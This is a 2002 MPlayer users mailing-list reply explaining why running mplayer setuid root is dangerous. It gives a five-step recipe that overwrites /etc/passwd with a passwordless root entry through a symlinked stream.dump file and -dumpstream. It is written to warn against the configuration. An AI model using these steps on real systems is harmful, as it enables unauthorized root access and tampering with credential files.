[MPlayer-users] Setuid root mplayer
D Richard Felker III
dalias at aerifal.cx
Wed Aug 28 15:55:02 CEST 2002
On Wed, Aug 28, 2002 at 12:30:23PM +0200, Davide Decicco wrote:
> [Automatic answer: RTFM (read DOCS, FAQ), also read DOCS/bugreports.html]
> Is someone able to explain me (or point me to some useful resource on the
> web) why setuid root mplayer is a security risk ? How can one gain root
> privileges through it ?
> Thanks.
1) Make an mp3 file containing the string (\n = newline):
\nroot::0:0::/root:/bin/sh\n
2) Mux it into an avi with mencoder.
3) ln -s /etc/passwd stream.dump
4) mplayer -dumpstream your.avi
5) Login as root with no password.
Sound good? That's just a dumb simple approach that assumes blank
passwords are allowed on the system and the passwords are stored in
/etc/passwd. Of course there are much better ways too.
Rich
More information about the MPlayer-users
mailing list